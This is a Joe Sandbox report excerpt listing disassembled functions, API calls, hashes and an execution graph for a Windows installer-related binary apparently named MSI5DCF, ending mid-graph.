                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: 0aa80fe6de241a420762afc71d764ccff2204f4930fbaa6593e4247def071062
                                                                        • Instruction ID: 1179a1a4e79c2973e65fef20574cdd5f776398274f597068f772af35a4c8d57f
                                                                        • Opcode Fuzzy Hash: 0aa80fe6de241a420762afc71d764ccff2204f4930fbaa6593e4247def071062
                                                                        • Instruction Fuzzy Hash: 3F312871A1020DEBDF14DFE4D981AEEBBB2BF48304F204429F905AB251E734AE15CB61
                                                                        Function 00ADD5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: b39d73c114712bc7a0c520051bef6cbf79826105413febba4a58929db9fec4ca
                                                                        • Instruction ID: 41e7b00b988be35d92b75587c50e8ec6a202faf64caa1cbdf6a626ee558133f0
                                                                        • Opcode Fuzzy Hash: b39d73c114712bc7a0c520051bef6cbf79826105413febba4a58929db9fec4ca
                                                                        • Instruction Fuzzy Hash: 8E21B1711183449FD711CF18C859B9BBBE9AF89304F04895EFA9987392D638D918C7E2
                                                                        Function 00ADD6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: 3e9fce11ca1897365caaab417e66c515cce5b85dbb9eae69775f6d4789b076d0
                                                                        • Instruction ID: d2865a439bdbbf41fb0732432a81f1323ecc7454458e9eb9a4732db40f65985c
                                                                        • Opcode Fuzzy Hash: 3e9fce11ca1897365caaab417e66c515cce5b85dbb9eae69775f6d4789b076d0
                                                                        • Instruction Fuzzy Hash: A521C1752083459FE711CF18C845B9BBBE9AB89300F14885EFA9587392C734D918CBA7
                                                                        Function 00ADD7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: cf24838cc7fc71b5c7cd1002dfc6886296181930d4932caad53f2affcd05348c
                                                                        • Instruction ID: 751dc9d46b0c25a661010d77e55f48ca418ff04c9525714bb6b8fde2dd9b1709
                                                                        • Opcode Fuzzy Hash: cf24838cc7fc71b5c7cd1002dfc6886296181930d4932caad53f2affcd05348c
                                                                        • Instruction Fuzzy Hash: 0121B2712083459FE711CF14C845B9BBBEAAB85300F04881EF99587292C734D918D7A2
                                                                        Function 00AD80D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00AD8116
                                                                        • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,B7207CF4), ref: 00AD8185
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertFreeLocalString
                                                                        • String ID: Invalid SID
                                                                        • API String ID: 3201929900-130637731
                                                                        • Opcode ID: b2776f6eb30e6419cd1f6f8f8c9de3e51ef7ca761e3cace039890d6d483889f6
                                                                        • Instruction ID: 9604da557c21d1a05670496619a8855d9d35843419097ede116d66df3961de2e
                                                                        • Opcode Fuzzy Hash: b2776f6eb30e6419cd1f6f8f8c9de3e51ef7ca761e3cace039890d6d483889f6
                                                                        • Instruction Fuzzy Hash: 55219F71A00305ABDB10DF58C855BAFBBB8EB44B04F10864EE812A7380DBB96A458B90
                                                                        Function 00ADC140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC16B
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADC1CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3988782225-1405518554
                                                                        • Opcode ID: bcd4f11f091085731ae793b36e1c9234e2023b9860a3be5ba5b9bf3354d8d7bc
                                                                        • Instruction ID: c8bf228862d0386e11d5160b76c6abba1cfc108dbaae58243fca2305aa0d93ca
                                                                        • Opcode Fuzzy Hash: bcd4f11f091085731ae793b36e1c9234e2023b9860a3be5ba5b9bf3354d8d7bc
                                                                        • Instruction Fuzzy Hash: C221FD70809B84EED721CF68C90478BBFF4EF15714F108A9EE08997781D7B5AA04CBA1
                                                                        Function 00AE4077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 2427045233-2658103896
                                                                        • Opcode ID: 43fa79bdb98781ab86d646732d1e1a11bd6035551fb403a1cfe2c577ee761ce1
                                                                        • Instruction ID: d211f82bded0d7acd95ff286b850d21a585f11a784ed2411b43d391b04e0907f
                                                                        • Opcode Fuzzy Hash: 43fa79bdb98781ab86d646732d1e1a11bd6035551fb403a1cfe2c577ee761ce1
                                                                        • Instruction Fuzzy Hash: 7411E271D00785AEC725EFB4D912B8ABBF4AF18300F04896BF1A68B751EB30E504CB50
                                                                        Function 00AE1E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00AE0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,B7207CF4,?,00B193B0,000000FF), ref: 00AE0B27
                                                                          • Part of subcall function 00AE0B00: GetLastError.KERNEL32(?,00000000,00000000,B7207CF4,?,00B193B0,000000FF), ref: 00AE0B31
                                                                        • IsDebuggerPresent.KERNEL32(?,?,00B2FAD8), ref: 00AE1E48
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B2FAD8), ref: 00AE1E57
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AE1E52
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3511171328-631824599
                                                                        • Opcode ID: 586c4a33544a094be3be1a92ae762031922106191bd49cd4f51369aa2a5825f1
                                                                        • Instruction ID: 2dc870fb26f48fd40e985298551b344c7ed661508814f438d84e1c9bc43f5cd5
                                                                        • Opcode Fuzzy Hash: 586c4a33544a094be3be1a92ae762031922106191bd49cd4f51369aa2a5825f1
                                                                        • Instruction Fuzzy Hash: D6E09270600751CFC320AF2AE5047967BE4AF04704FC0C85DE892C3340DBB4E884CB91
                                                                        Function 00AD6C20 Relevance: 5.2, APIs: 4, Instructions: 183memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,40000022,B7207CF4,?,00000000,?,?,?,?,00B19DA0,000000FF,?,00AD6432,00000000,?), ref: 00AD6CC4
                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,B7207CF4,?,00000000,?,?,?,?,00B19DA0,000000FF,?,00AD6432,00000000,?), ref: 00AD6CE7
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00B19DA0,000000FF,?,00AD6432,00000000), ref: 00AD6D87
                                                                        • LocalFree.KERNEL32(?,B7207CF4,00000000,00B193B0,000000FF,?,00000000,00000000,00B19DA0,000000FF,B7207CF4), ref: 00AD6E0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 8860f778cb40d78118b41817a044a9b69f7e5805a0b2771a39e8943bfe965830
                                                                        • Instruction ID: ef0d93fb26037283ce907285f923beac85861727e7429a9925d2a70829fc9f21
                                                                        • Opcode Fuzzy Hash: 8860f778cb40d78118b41817a044a9b69f7e5805a0b2771a39e8943bfe965830
                                                                        • Instruction Fuzzy Hash: 9C51A6B5A006059FDB18CF68D985BAEBBB5FB48310F14422EF856E7390DB35AD10CB94
                                                                        Function 00AD4A80 Relevance: 5.2, APIs: 4, Instructions: 169memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00AD4B05
                                                                        • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00AD4B25
                                                                        • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00AD4BAB
                                                                        • LocalFree.KERNEL32(00000000,B7207CF4,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00AD4C2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 1768e33e67e8b4eb6caa0b6ea03f9f7683e66a61e4e82833d2a176e554070db8
                                                                        • Instruction ID: 9f725b96d889e14a8f724177d6294d2de74637d257ae5e162399593e9bb74738
                                                                        • Opcode Fuzzy Hash: 1768e33e67e8b4eb6caa0b6ea03f9f7683e66a61e4e82833d2a176e554070db8
                                                                        • Instruction Fuzzy Hash: F051C072604215AFC715DF28D981A6AB7E9FB89360F140A6FF856D73A0DB70E9008B91

                                                                        Execution Graph

                                                                        Execution Coverage:1.3%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:344
                                                                        Total number of Limit Nodes:5
                                                                        execution_graph 34490 ae7f70 34493 ae7fd0 GetTokenInformation 34490->34493 34494 ae804e GetLastError 34493->34494 34495 ae7fa8 34493->34495 34494->34495 34496 ae8059 34494->34496 34497 ae8069 codecvt 34496->34497 34498 ae809e GetTokenInformation 34496->34498 34499 ae8079 34496->34499 34497->34498 34498->34495 34502 ae8260 45 API calls 3 library calls 34499->34502 34501 ae8082 34501->34498 34502->34501 34503 b07e5e 34504 b07e6a __FrameHandler3::FrameUnwindToState 34503->34504 34529 b079c1 34504->34529 34506 b07e71 34507 b07fc4 34506->34507 34516 b07e9b ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 34506->34516 34576 b083bd 4 API calls 2 library calls 34507->34576 34509 b07fcb 34577 b1854c 23 API calls __CreateFrameInfo 34509->34577 34511 b07fd1 34578 b18510 23 API calls __CreateFrameInfo 34511->34578 34513 b07fd9 34514 b07eba 34515 b07f3b 34540 b084d8 34515->34540 34516->34514 34516->34515 34575 b18526 41 API calls 4 library calls 34516->34575 34518 b07f41 34544 af1a20 GetCommandLineW 34518->34544 34530 b079ca 34529->34530 34579 b0801c IsProcessorFeaturePresent 34530->34579 34532 b079d6 34580 b0ae59 10 API calls 2 library calls 34532->34580 34534 b079db 34535 b079df 34534->34535 34581 b18fb0 34534->34581 34535->34506 34538 b079f6 34538->34506 34640 b08e90 34540->34640 34542 b084eb GetStartupInfoW 34543 b084fe 34542->34543 34543->34518 34545 af1a60 34544->34545 34641 ae4ec0 LocalAlloc 34545->34641 34547 af1a71 34642 ae8ba0 34547->34642 34549 af1ac9 34550 af1add 34549->34550 34551 af1acd 34549->34551 34650 af0b70 LocalAlloc LocalAlloc 34550->34650 34697 ae8790 81 API calls __ehhandler$___std_fs_get_file_id@8 34551->34697 34554 af1ad6 34556 af1c26 ExitProcess 34554->34556 34555 af1ae9 34651 af0e90 34555->34651 34562 af1b2b 34669 aeae00 34562->34669 34564 af1bb4 34570 af1c08 34564->34570 34675 ae8e20 34564->34675 34565 af1b82 34565->34564 34566 ae29d0 44 API calls 34565->34566 34566->34564 34568 af1bef 34569 af1bfb 34568->34569 34568->34570 34698 af1400 CreateFileW SetFilePointer WriteFile CloseHandle 34569->34698 34699 ae4000 42 API calls 34570->34699 34573 af1c17 34700 af1c30 LocalFree LocalFree 34573->34700 34575->34515 34576->34509 34577->34511 34578->34513 34579->34532 34580->34534 34585 b2154e 34581->34585 34584 b0ae78 7 API calls 2 library calls 34584->34535 34586 b2155e 34585->34586 34587 b079e8 34585->34587 34586->34587 34589 b1c2f6 34586->34589 34587->34538 34587->34584 34590 b1c302 __FrameHandler3::FrameUnwindToState 34589->34590 34601 b172ca EnterCriticalSection 34590->34601 34592 b1c309 34602 b21abc 34592->34602 34595 b1c327 34617 b1c34d LeaveCriticalSection std::_Lockit::~_Lockit 34595->34617 34598 b1c338 34598->34586 34599 b1c322 34616 b1c246 GetStdHandle GetFileType 34599->34616 34601->34592 34603 b21ac8 __FrameHandler3::FrameUnwindToState 34602->34603 34604 b21af2 34603->34604 34605 b21ad1 34603->34605 34618 b172ca EnterCriticalSection 34604->34618 34626 b0c6b0 14 API calls std::_Stodx_v2 34605->34626 34608 b21ad6 34627 b0c5b2 41 API calls collate 34608->34627 34610 b1c318 34610->34595 34615 b1c190 44 API calls 34610->34615 34611 b21b2a 34628 b21b51 LeaveCriticalSection std::_Lockit::~_Lockit 34611->34628 34614 b21afe 34614->34611 34619 b21a0c 34614->34619 34615->34599 34616->34595 34617->34598 34618->34614 34629 b1c72b 34619->34629 34621 b21a1e 34625 b21a2b 34621->34625 34636 b1cddf 6 API calls std::_Lockit::_Lockit 34621->34636 34624 b21a80 34624->34614 34637 b1aa28 14 API calls 2 library calls 34625->34637 34626->34608 34627->34610 34628->34610 34635 b1c738 __cftoe 34629->34635 34630 b1c778 34639 b0c6b0 14 API calls std::_Stodx_v2 34630->34639 34631 b1c763 RtlAllocateHeap 34633 b1c776 34631->34633 34631->34635 34633->34621 34635->34630 34635->34631 34638 b215f6 EnterCriticalSection LeaveCriticalSection __cftoe 34635->34638 34636->34621 34637->34624 34638->34635 34639->34633 34640->34542 34641->34547 34643 ae8bf2 34642->34643 34644 ae8c34 34643->34644 34647 ae8c22 34643->34647 34645 b07708 __ehhandler$___std_fs_get_file_id@8 5 API calls 34644->34645 34646 ae8c42 34645->34646 34646->34549 34701 b07708 34647->34701 34649 ae8c30 34649->34549 34650->34555 34652 af0ea4 34651->34652 34657 af1242 34651->34657 34653 af12a0 34652->34653 34652->34657 34709 ae83e0 14 API calls 34653->34709 34655 af12b0 RegOpenKeyExW 34656 af12ce RegQueryValueExW 34655->34656 34655->34657 34656->34657 34658 ae29d0 34657->34658 34659 ae29f1 34658->34659 34659->34659 34710 ae3b40 34659->34710 34661 ae2a09 34662 ae9110 34661->34662 34729 ae2a10 34662->34729 34664 ae9156 34747 ae98d0 34664->34747 34670 aeae0d 34669->34670 34671 aeae0a 34669->34671 34672 aeae1a 34670->34672 34795 b10f1e 42 API calls 2 library calls 34670->34795 34671->34565 34672->34565 34674 aeae2d 34674->34565 34676 ae8e69 34675->34676 34677 ae8e54 34675->34677 34796 ae5f90 GetCurrentProcess OpenProcessToken 34676->34796 34677->34568 34679 ae8e7c 34680 ae8f3e 34679->34680 34682 ae8e96 34679->34682 34681 ae1fc0 67 API calls 34680->34681 34683 ae8f65 34681->34683 34801 ae1fc0 34682->34801 34685 ae1fc0 67 API calls 34683->34685 34687 ae8f7a 34685->34687 34686 ae8eaa 34688 ae1fc0 67 API calls 34686->34688 34689 ae1fc0 67 API calls 34687->34689 34690 ae8ec7 34688->34690 34691 ae8f8b 34689->34691 34692 ae1fc0 67 API calls 34690->34692 34867 ae7660 34691->34867 34694 ae8ed5 34692->34694 34820 ae6ee0 34694->34820 34696 ae8eed 34696->34568 34697->34554 34698->34570 34699->34573 34700->34556 34702 b07710 34701->34702 34703 b07711 IsProcessorFeaturePresent 34701->34703 34702->34649 34705 b07bd9 34703->34705 34708 b07b9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34705->34708 34707 b07cbc 34707->34649 34708->34707 34709->34655 34711 ae3c15 34710->34711 34717 ae3b54 34710->34717 34727 ae3680 42 API calls collate 34711->34727 34712 ae3b60 _Yarn 34712->34661 34714 ae3b8d 34718 ae3c10 34714->34718 34722 ae3bbf LocalAlloc 34714->34722 34715 ae3c1a 34728 b0c5c2 41 API calls 2 library calls 34715->34728 34717->34712 34717->34714 34717->34718 34721 ae3bd7 34717->34721 34726 ae3af0 RaiseException _com_raise_error collate 34718->34726 34723 ae3bdb LocalAlloc 34721->34723 34725 ae3be8 _Yarn 34721->34725 34722->34715 34724 ae3bcc 34722->34724 34723->34725 34724->34725 34725->34661 34730 ae2a36 34729->34730 34731 ae2afc 34730->34731 34733 ae2a77 34730->34733 34736 ae2af7 34730->34736 34737 ae2a52 _Yarn 34730->34737 34738 ae2ac1 34730->34738 34785 ae3680 42 API calls collate 34731->34785 34733->34736 34739 ae2aa9 LocalAlloc 34733->34739 34734 ae2b01 34786 b0c5c2 41 API calls 2 library calls 34734->34786 34784 ae3af0 RaiseException _com_raise_error collate 34736->34784 34737->34664 34742 ae2ac5 LocalAlloc 34738->34742 34746 ae2ad2 _Yarn 34738->34746 34739->34734 34741 ae2ab6 34739->34741 34741->34746 34742->34746 34746->34664 34748 ae992a 34747->34748 34755 ae9a92 34747->34755 34751 ae9955 34748->34751 34748->34755 34749 ae9a79 34750 b07708 __ehhandler$___std_fs_get_file_id@8 5 API calls 34749->34750 34752 ae916b 34750->34752 34753 ae9972 34751->34753 34754 ae9bd1 34751->34754 34774 ae9bf0 34752->34774 34757 ae3b40 44 API calls 34753->34757 34790 ae4650 42 API calls 34754->34790 34755->34749 34758 ae9bdb 34755->34758 34759 ae9aeb 34755->34759 34762 ae9996 34757->34762 34792 ae4650 42 API calls 34758->34792 34763 ae3b40 44 API calls 34759->34763 34760 ae9bd6 34791 b0c5c2 41 API calls 2 library calls 34760->34791 34787 ae9ef0 45 API calls _Yarn 34762->34787 34767 ae9b0f 34763->34767 34789 ae3cc0 42 API calls collate 34767->34789 34768 ae99b1 34788 ae3cc0 42 API calls collate 34768->34788 34771 ae99fa 34771->34749 34771->34760 34772 ae9a6e 34771->34772 34772->34749 34773 ae9a72 LocalFree 34772->34773 34773->34749 34783 ae9c6c _Yarn 34774->34783 34775 ae9183 34775->34562 34776 ae9e96 34776->34775 34778 ae9eb0 LocalFree 34776->34778 34777 ae9ee0 34793 b0c5c2 41 API calls 2 library calls 34777->34793 34778->34775 34780 ae9ee5 34794 ae4650 42 API calls 34780->34794 34783->34775 34783->34776 34783->34777 34783->34780 34787->34768 34788->34771 34789->34749 34795->34674 34797 ae5fb7 GetTokenInformation 34796->34797 34798 ae5fb1 34796->34798 34799 ae5fee CloseHandle 34797->34799 34800 ae5fe6 34797->34800 34798->34679 34799->34679 34800->34799 34916 ae2510 34801->34916 34804 ae20ea 34935 ae1910 LocalFree RaiseException _com_raise_error 34804->34935 34807 ae1ffa 34819 ae209f 34807->34819 34931 ae1cb0 10 API calls 34807->34931 34808 ae20fe 34810 ae202c 34811 ae2036 FindResourceW 34810->34811 34810->34819 34812 ae204e 34811->34812 34811->34819 34932 ae1d70 LoadResource LockResource SizeofResource 34812->34932 34814 ae2058 34815 ae207f 34814->34815 34814->34819 34933 ae2750 41 API calls 34814->34933 34934 b0c995 41 API calls 3 library calls 34815->34934 34818 ae208f 34818->34819 34936 ae1910 LocalFree RaiseException _com_raise_error 34818->34936 34819->34686 34821 ae5f90 4 API calls 34820->34821 34822 ae6f2d 34821->34822 34823 ae6f55 CoInitialize CoCreateInstance 34822->34823 34824 ae6f33 34822->34824 34826 ae6f8f 34823->34826 34827 ae6f98 VariantInit 34823->34827 34825 ae7660 90 API calls 34824->34825 34828 ae6f4d 34825->34828 34826->34828 34831 ae74f6 CoUninitialize 34826->34831 34829 ae6fde 34827->34829 34830 b07708 __ehhandler$___std_fs_get_file_id@8 5 API calls 34828->34830 34832 ae6ff1 IUnknown_QueryService 34829->34832 34839 ae6fe8 VariantClear 34829->34839 34833 ae7516 34830->34833 34831->34828 34835 ae7020 34832->34835 34832->34839 34833->34696 34836 ae7071 IUnknown_QueryInterface_Proxy 34835->34836 34835->34839 34837 ae709a 34836->34837 34836->34839 34838 ae70bf IUnknown_QueryInterface_Proxy 34837->34838 34837->34839 34838->34839 34840 ae70e8 CoAllowSetForegroundWindow 34838->34840 34839->34826 34841 ae7168 SysAllocString 34840->34841 34842 ae7102 SysAllocString 34840->34842 34841->34842 34844 ae751f _com_issue_error 34841->34844 34845 ae712f 34842->34845 34846 ae7138 SysAllocString 34842->34846 34948 ae1910 LocalFree RaiseException _com_raise_error 34844->34948 34845->34844 34845->34846 34848 ae717d VariantInit 34846->34848 34849 ae715d 34846->34849 34853 ae71fd 34848->34853 34849->34844 34849->34848 34850 ae7533 34850->34696 34851 ae7201 VariantClear VariantClear VariantClear VariantClear SysFreeString 34851->34839 34853->34851 34858 ae724b 34853->34858 34854 ae3b40 44 API calls 34854->34858 34858->34851 34858->34853 34858->34854 34859 ae751a 34858->34859 34860 ae72ef LocalFree 34858->34860 34862 ae7344 OpenProcess WaitForSingleObject 34858->34862 34865 ae73dd LocalFree 34858->34865 34866 ae7394 CloseHandle 34858->34866 34943 ae40a0 50 API calls 3 library calls 34858->34943 34944 ae61d0 95 API calls 2 library calls 34858->34944 34945 ae3cc0 42 API calls collate 34858->34945 34946 ae6a60 10 API calls 34858->34946 34947 b0c5c2 41 API calls 2 library calls 34859->34947 34860->34858 34862->34858 34864 ae737a GetExitCodeProcess 34862->34864 34864->34858 34865->34858 34866->34858 34868 ae76d1 34867->34868 34949 ae2100 42 API calls 4 library calls 34868->34949 34870 ae76e9 34950 ae2100 42 API calls 4 library calls 34870->34950 34872 ae7700 34951 ae7db0 59 API calls 2 library calls 34872->34951 34874 ae7718 34875 ae7a7b 34874->34875 34883 ae7747 34874->34883 34952 ae2750 41 API calls 34874->34952 34960 ae1910 LocalFree RaiseException _com_raise_error 34875->34960 34879 ae7a85 GetWindowThreadProcessId 34880 ae7aae GetWindowLongW 34879->34880 34881 